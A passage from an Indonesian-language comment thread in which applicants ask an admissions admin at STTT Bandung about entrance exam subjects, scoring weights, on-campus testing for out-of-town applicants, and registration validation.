      setiap prodi akan memiliki bobot penilaian masing2 tiap materi uji.jadi tidak perlu khawatir
  108. Ervanita
    Apakah yang mendaftar dari luar kota, ujiannya harus di kampus sttt juga?
    • admin
      betul
  109. Roy kurniawan
    Saya sudah mendaftar tapi belum divalidasi juga scan bukti pembayaran sudah dikirim
  110. haillagun
    Kak, anak smk gak pernah tau apa itu fisika dan kimia :'). Garmen ada hubungannya ke fisika dan kimia juga masa :')
    • admin
      setiap prodi akan memiliki bobot penilaian masing2 untuk setiap materi uji.Jadi jangan khawatir
  111. Nevi Martina
    Kak, sistem penilaiannya kayak sbm gitu ga benar=4 salah=-1 tdk isi=0 ? Atau beda? Boleh dijelaskan kak?
    • admin
      Mohon maaf, informasi tersebut hanya ada di tim seleksi, jadi kami tidak mengetahuin informasi tersebut
  112. hodijatun nahdah
    min knpa ya pas coba daftar disana tertulis "pendaftaran usm gelombang 4" itu gmna yaa?
  113. Ervanita
    Apakah yang mendaftar dari luar kota, ujian tulisnya harus di kampus sttt bandung?
    • admin
      betul. ujian di kampus STTT. Silhakna meluangkan waktu untuk mengikuti ujian sesuai tanggal ujian yang ada
  114. Asep
    Apakah dari ips juga harus bisa mengerjakan soal fiskim dan mtk?
    • panitiapmb
      ya